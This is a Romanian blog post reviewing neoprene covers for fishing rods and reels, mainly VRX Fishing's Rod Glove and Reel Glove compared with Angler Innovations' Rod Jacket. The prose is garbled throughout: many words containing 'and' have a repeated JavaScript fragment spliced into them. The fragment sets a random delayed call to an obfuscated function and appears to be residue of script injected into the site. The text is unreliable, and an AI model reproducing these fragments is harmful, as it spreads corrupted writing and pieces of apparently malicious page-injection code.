De multa vreme caut huse pentru lansete si mulinete care sa intruneasca toate conditiile, care credeam eu ca ar trebui sa le intruneasca.

Huse lansete

 • Sa nu fie din plastic (asemenea stick jacket), pentru a nu matui/zgaria finisajul inelelor
 • Sa fie dintr-un material ceva mai gros asemeni neoprenului pentru a proteja in cat de mare masura inelele si finisajul lansete/matisajului
 • Neaparat sa pot lasa naluca pe lanseta (mai mult de lene:) ) sau/si firul tras prin inele – insemnandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and ca trebuie sa acopere lanseta pana intr-un anumit punct, nu pana la mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andrina sau intreaga lanseta
 • Sa nu fie atasate de o husa de mulineta daca e posibil.
 • Bineinteles sa arate bine si sa fie practice:).

Huse mulinete

 • Preferabil din neopren
 • Sa fie gandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andite in asa fel incat sa se potriveasca atat pe mulinete Left Handom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and cat si Right Handom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and, in caz ca e nevoie pentru cineva(altcineva decat mine)
 • Sa pot lasa firul sa iasa liber de sub husa, nu sa fie strangulat intr-o parte, cum se intampla cu husele pe care le am in prezent
 • Neaparat sa pot lasa naluca pe lanseta sau/si firul tras prin inele
 • Sa protejeze cat mai bine mulineta, care am observat ca, cu cat e mai bine ingrijita, cu atat o poti vinde mai bine dupa ce te-ai saturat de ea sau vrei sa mai schimbi peisajul
 • Sa amortizeze cat de cat eventuala caderea mulinetei, in caz de accident
 • Sa nu fie de la vre-una dintre firmele care produc mulinete. Intotdeauna mi s-a parut ciudat sa am o husa pe care scrie Shimano pe o mulineta Abu sau Daiwa sau invers (piticii de pe creier… dar asta-mi doresc)
 • Sa nu fie incorporata pe husa lansetei, pentru a putea fi folosita atat pe lanseta cat si pentru depozitare separata.

Pana acum cel mai aproape de acest obiectiv au fost husele de la Angler Innovations, si anume Rod Jacket, dar care pentru cei care prefera mulinetele de baitcasting cu manivela pe stanga (mai toti romanii) nu sunt chiar perfecte, husa de la mulineta trebuind sa o montam invers, deci cu „aerisirea” pentru fir in spate, sugrumandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and putintel firul candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and strangeam lanseta. Candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and ma duc la pescuit cu barca sunt ok, dar candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and ma duc la pescuit de pe mal, parca ma enerveaza sa scot toata husa si sa o tot pun la loc de cate ori ma deplasez 500 metri cu masina, si pentru aceste ocazii aveam huse de mulineta separat. Plus ca oricum aveam nevoie in plus de huse de mulinete separat, cele de pe Rod Jacket nefiind detasabile (la un moment dat chiar ma gandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andeam sa le tai jos si sa le cos niste scai). Asa ca se pot folosi doar impreuna. De exemplu la un drum mai lung, cu 2-3 pescari, mulinetele trebuie demontate de pe lansete, ceea ce inseamna ca pentru fiecare mulineta am nevoie separat de cel putin inca o husa.

Acum cateva saptamani, dandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and aiurea peste un link pe net, totul s-a schimbat :D . Si mi-a revenit zambetul pe buze, chiar daca am schimbat o gramada de huse pana in prezent. Am dat intamplator peste o imagine care arata o husa de lanseta cu atas optional de husa pentru mulineta. Dupa 10-15 minute de cercetare dau peste site-ul http://vrxfishing.com , unde gasesc ceea ce cautam si anume Pro Series Rod Glove, The Reel Glove si un accesoriu aparent fara valoare The Rod Glove Saver.

Husele Pro Series Rod Glove sunt de neopren. Intradevar trebuie o idee mai multa indemanare pentru tras pe lanseta in comparatie cu Stick Jacket, husele din „sita” de plastic dur, care datorita rigiditatii gliseaza foarte rapid, fara griji pe lanseta. Dar compenseaza deficitul acestora, si anume protejeaza atat inelele cat si finisajul/lacul matisajelor acestora. Husele din sita de plastic, in timp matuiesc/zgarie lacul matisajelor inelelor, de la frecarea constanta cu acesta. Cei care le au si le-au utilizat stiu despre ce vorbes. Protejeaza foarte bine inelele, in special candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and sunt mai multe lansete amestecate si nu permite incurcarea firelor intre lansete la transport. Sunt de lungimea perfecta, permitandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and purtarea nalucii pe agatatorul lansetei. Atat cele de spinning cat si cele de casting sunt la fel de eficiente.

 

DSC04528

DSC04527

DSC04525

DSC04510

Pentru lansetele de spinning light sau ultra light dintr-o bucata par a fi putin greoaie in schimb. Dar pentru acestea cam orice husa pare a fi greoaie….

P.S. Pentru cei care doresc sa protejeze lanseta pana la mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andrina exista o optiune mai lunga cu cativa cm pentru lansetele de casting, care este menita pentru lansetele mai lungi sau sa protejeze pe o portiune mai lunga lansetele de lungimi uzuale: 6’6″ – 7’3″.

DSC04547

Husele pentru mulinetele de casting au un design simetric, ceea ce se traduce prin faptul ca pot fi utilizate identic atat pe mulinetele cu manerul pe stanga cat si pe mulinetele cu manerul pe dreapta. Prima oara candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and le montam poate fi mai ciudat, dar apoi e floare la ureche. Sunt gandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andite in asa fel incat sa nu stranguleze firul candom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and sunt montate, ba mai mult, asemeni huselor de la Shimano, care sunt mult mai subtiri, permit reglarea firului prin rotirea manivelei dupa ce sunt montate. Protejeaza intr-o oarecare masura si mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andrina lansetei. Pot fi montate pe mulineta chiar daca aceasta nu este pe lanseta, lucru pe care nu-l pot spune despre Rod Jacket de la Anglers Innovations.  Un singur dezavantaj am gasit la aceste huse: cei care au mulinete round profile inca nu pot beneficia de avantajele acestor huse minunate. Noroc ca nu ma numar printre acei putini :).

 

DSC04524

DSC04525

DSC04523

DSC04521

DSC04515

DSC04514

DSC04517

DSC04518

 

Husele de spinning sunt de asemenea foarte bine gandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andite, permitandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and utilizarea lor atat pe mulinete cu manivela setata pe dreapta sau pe stanga. Pot fi montate direct pe lanseta, fara a indeparta mulineta, sau doar pe mulineta, protejandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and intru totul mulineta. Parca nu se prea potrivesc pentru mulinetele de marimea 1000 (par cam maricele), dar in rest sunt minunate.

DSC04532

DSC04533

DSC04550

Rod Glove Saver, este un obiect banal: un elastic cu un clips daca e sa ne uitam bine. Dar un accesoriu care pastreaza husa pe lanseta indiferent de circumstante, un accesoriu cu un clips foarte ingenios si usor de utilizat.

DSC04543

DSC04542

 

Pe mine m-au convins, asa ca-mi schimb toate husele de pe mulinete in cel mai scurt timp, si-mi echipez in sfarsit ultimele creatii cu huse adevarate, care protejeaza din toate punctele de vedere lansetele.

Pentru cei care investesc in echipament stiu ca husele pentru protectia acestuia sunt la fel de importante in timp ca si echipamentul in sine, protejandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and inelele cat si blankul si finisajele de impact sau posibile accidente. Numai eu stiu de cate ori am dat inelele peste cap de la unele dintre lansetele mele dintr-o bucata din neatentie la transport (lucru care si pentru mine poate deveni un inconvenient, daca inelele sunt de titaniu si se rup dupa 2-3 astfel de intamplari). Lucru care in ultima vreme nu s-a mai intamplat din cauza ca folosesc huse din ce in ce mai des.